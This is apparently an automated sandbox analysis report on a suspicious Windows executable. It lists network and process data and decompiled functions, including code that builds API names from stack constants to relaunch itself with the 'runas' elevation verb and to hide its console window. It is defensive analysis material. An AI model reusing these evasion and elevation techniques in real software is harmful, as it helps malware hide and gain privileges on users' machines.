Aug 3, 2021 23:42:08.307447910 CEST	172.67.146.70	443	192.168.2.3	49712	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jul 18 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jul 18 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Aug 3, 2021 23:42:08.307447910 CEST	172.67.146.70	443	192.168.2.3	49712	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: 3fVvJyTvQU.exe PID: 5440 Parent PID: 5636

General

Start time:	23:42:04
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\3fVvJyTvQU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\3fVvJyTvQU.exe'
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	4003498F5C38CF05A71125D4E8745791
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6128 Parent PID: 5440

General

Start time:	23:42:05
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: 3fVvJyTvQU.exe PID: 5956 Parent PID: 5440

General

Start time:	23:42:06
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\3fVvJyTvQU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\3fVvJyTvQU.exe' -a
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	4003498F5C38CF05A71125D4E8745791
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 5300 Parent PID: 5956

General

Start time:	23:42:06
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 3fVvJyTvQU.exe PID: 5440 Parent PID: 5636 3fVvJyTvQU.exeCOMMON

Executed Functions

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _SHELLEXECUTEINFOW _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				struct HINSTANCE__* _t29;
				_Unknown_base(*)()* _t30;
				int _t36;
				char* _t47;

				_v76 = 0x6c656853;
				_v72 = 0x6578456c;
				_v68 = 0x65747563;
				_v64 = 0x577845;
				_v108 = 0x4c454853;
				_v104 = 0x32334c;
				_t29 = LoadLibraryA( &_v108);
				_t7 =  &_v76; // 0x6c656853
				_t30 = GetProcAddress(_t29, _t7);
				if(_t30 != 0) {
					_v88 = 0x70006f;
					_v84 = 0x6e0065;
					_v80 = 0;
					_v100 = 0x750072;
					_v96 = 0x61006e;
					_v92 = 0x73;
					_t47 =  &_v100;
					if(_a12 == 0) {
						_t47 =  &_v88;
					}
					memset( &(_v60.fMask), 0, 0xe << 2);
					_v60.lpParameters = _a8;
					_v60.cbSize = 0x3c;
					_v60.lpVerb = _t47;
					_v60.fMask = 0x440;
					_v60.nShow = 1;
					_v60.lpFile = _a4;
					_t36 = ShellExecuteExW( &_v60); // executed
					return _t36;
				} else {
					return _t30;
				}
			}

0x004018a7
0x004018b0
0x004018b8
0x004018c0
0x004018c8
0x004018d0
0x004018d8
0x004018de
0x004018e4
0x004018ee
0x004018fc
0x00401904
0x0040190c
0x00401914
0x0040191c
0x00401924
0x0040192c
0x00401930
0x00401932
0x00401932
0x00401941
0x0040194b
0x00401954
0x0040195c
0x00401960
0x00401968
0x00401970
0x00401974
0x0040197b
0x004018f3
0x004018f3
0x004018f3

APIs

LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4
ShellExecuteExW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401974

Strings

<, xrefs: 00401954
r, xrefs: 00401914
lExe, xrefs: 004018B0
SHEL, xrefs: 004018C8
Shel, xrefs: 004018DE, 004018E2
L32, xrefs: 004018D0
o, xrefs: 004018FC
n, xrefs: 0040191C
s, xrefs: 00401924
cute, xrefs: 004018B8
ExW, xrefs: 004018C0

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressExecuteLibraryLoadProcShell
String ID: <$ExW$L32$SHEL$Shel$cute$lExe$n$o$r$s
API String ID: 3429701994-1301878048
Opcode ID: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction ID: 5fbf3ab5474b3f5d763234864d4cabc52bd483d31f91fe065027036cbba7c068
Opcode Fuzzy Hash: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction Fuzzy Hash: 232110B55083819FE310CF15D44875BBBF5BBC8308F408A2DFA98A6220D7B9D6488F97

Uniqueness

Uniqueness Score: -1.00%

Function 0040267E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x408150);
				_push(E00403E38);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x40cf70 = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x40cf6c = _t25;
				 *0x40cf68 = _t25 << 8;
				 *0x40cf64 = _t8 >> 0x10;
				if(E00403DD2(_t25 << 8, 1) == 0) {
					E00402793(0x1c);
				}
				if(E0040324C() == 0) {
					E00402793(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E00403AA1(); // executed
				 *0x40d658 = GetCommandLineA();
				 *0x40cf54 = E0040396F();
				E00403722();
				E00403669();
				E004033D1();
				_t18 =  *0x40cf80; // 0x21f1150
				 *0x40cf84 = _t18;
				_push(_t18);
				_push( *0x40cf78);
				_v32 = E00402210( *0x40cf74);
				E004033FE(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E004034F1(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}

0x0040267e
0x00402681
0x00402683
0x00402688
0x00402693
0x00402694
0x004026a0
0x004026a1
0x004026a4
0x004026ae
0x004026b6
0x004026bc
0x004026c7
0x004026d0
0x004026df
0x004026e3
0x004026e8
0x004026f0
0x004026f4
0x004026f9
0x004026fa
0x004026fe
0x00402709
0x00402713
0x00402718
0x0040271d
0x00402722
0x00402727
0x0040272c
0x00402731
0x00402732
0x00402746
0x0040274a
0x00402756
0x00402762

APIs

GetVersion.KERNEL32 ref: 004026A4

Part of subcall function 00403DD2: HeapCreate.KERNELBASE(00000000,00001000,00000000,004026DC,00000001), ref: 00403DE3
Part of subcall function 00403DD2: HeapDestroy.KERNEL32 ref: 00403E22

GetCommandLineA.KERNEL32 ref: 00402703

Part of subcall function 00402793: ExitProcess.KERNEL32 ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitLineProcessVersion
String ID:
API String ID: 1387771204-0
Opcode ID: cdbf96e081b01a7d6bd9d8a0d3451e8e86eb29aef74759af5c3b537a322f530d
Instruction ID: 569479402dad0df0017eca00dd20da1a283206a5241b0072165a3600902a2096
Opcode Fuzzy Hash: cdbf96e081b01a7d6bd9d8a0d3451e8e86eb29aef74759af5c3b537a322f530d
Instruction Fuzzy Hash: 2721A4B0940601DFD704BF76DE46B293B69EB08705F10063EF801B62E1DE7D45008B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004053B0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053B0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040536A); // executed
				 *0x40d120 = _t1;
				return _t1;
			}

0x004053b5
0x004053bb
0x004053c0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000536A), ref: 004053B5

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 627b88ac86c256a7c4a48b6754f24b6e2fee30d234351372c5d77ecc9702302b
Instruction ID: c601f6833b7545682c4954244099f4cccc76edc48f8a1764b0b9f8477c52ef2f
Opcode Fuzzy Hash: 627b88ac86c256a7c4a48b6754f24b6e2fee30d234351372c5d77ecc9702302b
Instruction Fuzzy Hash: 10A001B4941640CAD6005FA0AA095167A60B648642715827AA881B52A4DFB500189A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004053C2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 004053C7

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction ID: d332188bd55615930e72a30cb54faed210c9574330ed5165572dacab72e8a7a4
Opcode Fuzzy Hash: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401ED0() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				_Unknown_base(*)()* _t11;
				intOrPtr* _t12;
				void* _t14;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;

				_t16 =  *0x40cf50; // 0x77400000
				_v32 = 0x776f6853;
				_v28 = 0x646e6957;
				_v24 = 0x776f;
				_t11 = GetProcAddress(_t16,  &_v32);
				_t4 =  &_v20; // 0x646e6957
				_t18 = _t11;
				_v20 = 0x43746547;
				_v16 = 0x6f736e6f;
				_v12 = 0x6957656c;
				_v8 = 0x776f646e;
				_v4 = 0;
				_t12 = E00401000(_t4);
				if(_t12 != 0) {
					_t14 =  *_t12(); // executed
					if(_t14 != 0) {
						 *_t18(_t14, 0); // executed
					}
				}
				return 0;
			}

0x00401ed3
0x00401ee0
0x00401ee8
0x00401ef0
0x00401ef8
0x00401efe
0x00401f02
0x00401f05
0x00401f0d
0x00401f15
0x00401f1d
0x00401f25
0x00401f2d
0x00401f37
0x00401f39
0x00401f3d
0x00401f42
0x00401f42
0x00401f3d
0x00401f4a

APIs

GetProcAddress.KERNEL32 ref: 00401EF8

Part of subcall function 00401000: LoadLibraryA.KERNEL32(74AF0000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
Part of subcall function 00401000: GetProcAddress.KERNEL32(74AF0000,?), ref: 0040103A

GetConsoleWindow.KERNELBASE ref: 00401F39

Strings

onso, xrefs: 00401F0D
ndow, xrefs: 00401F1D
Show, xrefs: 00401EE0
WindShow, xrefs: 00401EFE, 00401F04
leWi, xrefs: 00401F15

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ConsoleLibraryLoadWindow
String ID: Show$WindShow$leWi$ndow$onso
API String ID: 3244098602-3304525419
Opcode ID: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction ID: 7c2929fdc0435c11f451e5eae0e96c8988408f82577c475e854d6584631a204a
Opcode Fuzzy Hash: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction Fuzzy Hash: F3F0FFB040C3439BE710DF55994575BBBE4BF84748F00491CF498A6298E734D608CFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00403AA1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00403AA1() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E004028A0(0x480);
				if(_t89 == 0) {
					E0040276E(0x1b);
				}
				 *0x40d540 = _t89;
				 *0x40d640 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x40d540; // 0x21f0630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x40d540; // 0x21f0630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x40d640);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x40d640 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x40d540[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x40d544;
					while(1) {
						_t69 = E004028A0(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x40d640 =  *0x40d640 + 0x20;
						__eflags =  *0x40d640;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x40d640 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x40d640; // 0x20
					goto L18;
				}
			}

0x00403ab4
0x00403ab9
0x00403abd
0x00403ac2
0x00403ac3
0x00403ac9
0x00403ad3
0x00403ad3
0x00403ad9
0x00403add
0x00403ae1
0x00403ae4
0x00403ae8
0x00403aec
0x00403af1
0x00403af4
0x00403af4
0x00403aff
0x00403b05
0x00403b0a
0x00403be1
0x00403be1
0x00403be1
0x00403be3
0x00403be3
0x00403be9
0x00403bec
0x00403bf0
0x00403bf3
0x00403c42
0x00403c42
0x00403c42
0x00000000
0x00403c42
0x00403bf5
0x00403bf7
0x00403bfb
0x00403c07
0x00403c09
0x00403c09
0x00403bfd
0x00403bff
0x00403bff
0x00403c13
0x00403c15
0x00403c18
0x00403c31
0x00403c31
0x00403c1a
0x00403c1b
0x00403c21
0x00403c23
0x00000000
0x00000000
0x00403c25
0x00403c2a
0x00403c2c
0x00403c2f
0x00403c37
0x00403c3a
0x00403c3c
0x00403c3c
0x00000000
0x00403c3a
0x00000000
0x00403c2f
0x00403c46
0x00403c46
0x00403c47
0x00403c47
0x00403c5c
0x00403c5c
0x00403b10
0x00403b13
0x00403b15
0x00000000
0x00000000
0x00403b1b
0x00403b1d
0x00403b23
0x00403b2b
0x00403b2d
0x00403b2f
0x00403b2f
0x00403b31
0x00403b37
0x00403b8f
0x00403b8f
0x00403b91
0x00403b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00403b95
0x00403b95
0x00403b98
0x00403b9a
0x00403b9d
0x00000000
0x00000000
0x00403b9f
0x00403ba1
0x00403ba3
0x00000000
0x00000000
0x00403ba5
0x00403ba7
0x00403bb4
0x00403bbb
0x00403bbb
0x00403bc8
0x00403bd0
0x00403bd4
0x00000000
0x00403bd4
0x00403baa
0x00403bb0
0x00403bb2
0x00000000
0x00000000
0x00000000
0x00403bd7
0x00403bd7
0x00403bdb
0x00403bdc
0x00403bdd
0x00403bdd
0x00000000
0x00403b39
0x00403b39
0x00403b3e
0x00403b43
0x00403b48
0x00403b4b
0x00000000
0x00000000
0x00403b4d
0x00403b4d
0x00403b54
0x00403b56
0x00403b56
0x00403b5c
0x00403b5c
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b64
0x00403b67
0x00403b6b
0x00403b71
0x00403b74
0x00403b74
0x00403b7c
0x00403b7f
0x00403b85
0x00000000
0x00000000
0x00000000
0x00403b87
0x00403b89
0x00000000
0x00403b89

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403AFF
GetFileType.KERNEL32(00000480), ref: 00403BAA
GetStdHandle.KERNEL32(-000000F6), ref: 00403C0D
GetFileType.KERNELBASE(00000000), ref: 00403C1B
SetHandleCount.KERNEL32 ref: 00403C52

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction ID: 0feba543a149a90732486762e9820594143cce74d2de5f228603b0d6f6fd20e8
Opcode Fuzzy Hash: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction Fuzzy Hash: 615149329042118FD7208F68C9847667FF8AB4132DF25467EC596FB2E1DB38EA09C719

Uniqueness

Uniqueness Score: -1.00%

Function 00403420, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00403420(void* __esi, char _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E004034C5();
				_t23 = 1;
				_t27 =  *0x40cfa0 - _t23; // 0x1
				if(_t27 == 0) {
					_t1 =  &_a4; // 0x40274f
					TerminateProcess(GetCurrentProcess(),  *_t1);
				}
				_t16 = _a12;
				 *0x40cf9c = _t23;
				 *0x40cf98 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x40d650; // 0x21f04c8
					if(_t9 != 0) {
						_t22 =  *0x40d64c; // 0x21f04cc
						_push(_t24);
						_t4 = _t22 - 4; // 0x21f04c8
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x40d650; // 0x21f04c8
							} while (_t32 >= 0);
						}
					}
					E004034D7(0x40a020, 0x40a024);
				}
				E004034D7(0x40a028, 0x40a030);
				if(_t16 == 0) {
					_t5 =  &_a4; // 0x40274f
					 *0x40cfa0 = _t23; // executed
					ExitProcess( *_t5);
				}
				return E004034CE();
			}

0x00403420
0x00403421
0x00403428
0x00403429
0x0040342f
0x00403431
0x0040343c
0x0040343c
0x00403448
0x0040344c
0x00403452
0x00403458
0x0040345a
0x00403461
0x00403463
0x00403469
0x0040346a
0x0040346a
0x0040346f
0x00403471
0x00403471
0x00403475
0x00403477
0x00403477
0x00403479
0x0040347c
0x0040347c
0x00403471
0x00403484
0x0040348f
0x00403495
0x004034a0
0x004034aa
0x004034b3
0x004034b7
0x004034bd
0x004034bd
0x004034b2

APIs

GetCurrentProcess.KERNEL32(O'@,?,0040340B,00000000,00000000,00000000,0040274F,00000000), ref: 00403435
TerminateProcess.KERNEL32(00000000,?,0040340B,00000000,00000000,00000000,0040274F,00000000), ref: 0040343C
ExitProcess.KERNEL32 ref: 004034BD

Strings

O'@, xrefs: 004034B3, 00403431

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202870545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202881099.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202885099.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202889113.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202893852.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID: O'@
API String ID: 1703294689-681500698
Opcode ID: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction ID: 6ac6280df9b2c45934149a80a540ee9e00ba380f690e92410c80f634368cd1f9
Opcode Fuzzy Hash: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction Fuzzy Hash: 6901D6316043019EDA12AF65FE85A1EBFA9EB40716B10853FF4847B1D0CB3DA984CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403DD2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403DD2(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x40d524 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00403C8A(_t12, _t15);
					 *0x40d528 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E00404BE3();
							goto L5;
						}
					} else {
						_t10 = E0040409C(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x40d524);
							goto L7;
						}
					}
				}
			}

0x00403dd2
0x00403de3
0x00403de9
0x00403deb
0x00403df0
0x00403e28
0x00403e2a
0x00403df2
0x00403df2
0x00403dfa
0x00403dff
0x00403e0e
0x00403e11
0x00000000
0x00403e13
0x00403e13
0x00000000
0x00403e13
0x00403e01
0x00403e06
0x00403e18
0x00403e1a
0x00403e2b
0x00403e2d
0x00403e2e
0x00403e1c
0x00403e22
0x00000000
0x00403e22
0x00403e1a
0x00403dff

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004026DC,00000001), ref: 00403DE3

Part of subcall function 00403C8A: GetVersionExA.KERNEL32 ref: 00403CA9

HeapDestroy.KERNEL32 ref: 00403E22

Part of subcall function 0040409C: HeapAlloc.KERNEL32(00000000,00000140,00403E0B,000003F8), ref: 004040A9

Memory Dump Source

Source File: 00000000.00000002.202874069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

